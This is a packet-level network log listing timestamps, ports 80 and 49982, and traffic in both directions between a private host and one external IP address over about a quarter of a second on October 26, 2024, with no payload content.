Oct 26, 2024 07:27:21.811942101 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.811954975 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.811960936 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.811970949 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.811975002 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.811983109 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.811988115 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.811997890 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.812001944 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.812020063 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.812036991 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.812037945 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.812052011 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.812063932 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.812083960 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.812093019 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.812172890 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.812283993 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.812295914 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.812306881 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.812319040 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.812321901 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.812330961 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.812342882 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.812345028 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.812355995 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.812365055 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.812369108 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.812376022 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.812382936 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.812405109 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.812427998 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.812587976 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.812618017 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.812629938 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.812654972 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.812679052 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.812700033 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.812711954 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.812721968 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.812746048 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.812747002 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.812758923 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.812769890 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.812772989 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.812783003 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.812794924 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.812798023 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.812820911 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.812829018 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.812845945 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.812870979 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.813015938 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.813041925 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.813054085 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.813081980 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.813097954 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.813102007 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.813111067 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.813129902 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.813139915 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.813146114 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.813153028 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.813164949 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.813170910 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.813174963 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.813188076 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.813211918 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.813368082 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.813412905 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.813425064 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.813452959 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.813461065 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.813476086 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.813488007 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.813500881 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.813523054 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.813546896 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.854237080 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.854250908 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.854262114 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.854274035 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.854286909 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.854309082 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.854352951 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.855338097 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.855350018 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.855360985 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.855423927 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.855438948 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.868802071 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.868814945 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.868827105 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.868839025 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.868860960 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.868892908 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.868933916 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.883127928 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.883223057 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.883234978 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.883244991 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.883256912 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.883269072 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.883280039 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.883291006 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.883306026 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.883337975 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.883357048 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.883413076 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.883425951 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.883469105 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.883480072 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.883498907 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.883512020 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.883512974 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.883533001 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.883558989 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.883569002 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.883579969 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.883590937 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.883601904 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.883615971 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.883618116 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.883630037 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.883631945 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.883645058 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.883654118 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.883690119 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.883822918 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.883836031 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.883846045 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.883872986 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.883886099 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.883907080 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.883919001 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.883929014 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.883944035 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.883944035 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.883961916 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.883980989 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.884394884 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.884438038 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.884485960 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.884496927 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.884512901 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.884524107 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.884533882 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.884535074 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.884540081 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.884551048 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.884560108 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.884567022 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.884581089 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.884588957 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.884592056 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.884604931 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.884613037 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.884615898 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.884629011 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.884632111 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.884650946 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.884680986 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.889283895 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.889306068 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.889321089 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.889334917 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.889348030 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.889360905 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.889369965 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.889415026 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.928731918 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.928746939 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.928757906 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.928771019 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.928782940 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.928792953 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.928795099 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.928814888 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.928842068 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.929064035 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.929100990 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.929112911 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.929146051 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.929162025 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.929167032 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.929177046 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.929214954 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.929282904 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.929378986 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.929398060 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.929408073 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.929420948 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.929431915 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.929433107 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.929441929 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.929475069 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.929500103 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.929538012 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.929554939 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.929559946 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.929562092 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.929601908 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.929615021 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.929625988 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.929640055 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.929661989 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.929672003 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.929692030 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.929702997 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.929716110 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.929728031 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.929743052 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.929763079 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.929786921 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.929830074 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.929907084 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.929919004 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.929929972 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.929944038 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.929944992 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.929950953 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.929954052 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.929977894 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.930002928 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.930007935 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.930021048 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.930032969 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.930043936 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.930063963 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.930084944 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.930126905 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.930139065 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.930154085 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.930176020 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.930223942 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.930236101 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.930249929 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.930269003 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.930279970 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.930291891 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.930294991 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.930329084 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.930342913 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.930354118 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.930388927 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.930427074 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.930438042 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.930464029 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.930474043 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.930502892 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.930515051 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.930536032 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.930541992 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.930582047 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.930627108 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.930639029 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.930650949 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.930674076 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.930686951 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.930721998 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.930727005 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.930735111 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.930747032 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.930761099 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.930762053 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.930772066 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.930789948 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.930809975 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.931078911 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.931092024 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.931112051 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.931123018 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.931133986 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.931144953 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.931147099 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.931158066 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.931169987 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.931173086 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.931183100 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.931195974 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.931200027 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.931211948 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.931220055 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.931236029 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.931325912 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.931345940 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.931396008 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.931406975 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.931442976 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.931591034 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.972570896 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.972589970 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.972677946 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.972718954 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.972733021 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.972744942 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.972867966 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.972867966 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.973216057 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.973229885 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.973273039 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.973349094 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.973515034 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.973558903 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.973731995 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.973769903 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.986737967 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.986752987 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.986764908 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.986778021 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.986790895 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.986800909 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.986851931 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.986898899 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.001658916 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.001760960 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.001782894 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.001796007 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.001868010 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.001904964 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.001916885 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.001972914 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.001972914 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.001972914 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.001972914 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.001979113 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.002124071 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.002135992 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.002147913 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.002171040 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.002176046 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.002186060 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.002197981 CEST	80	49982	185.215.113.84	192.168.2.7
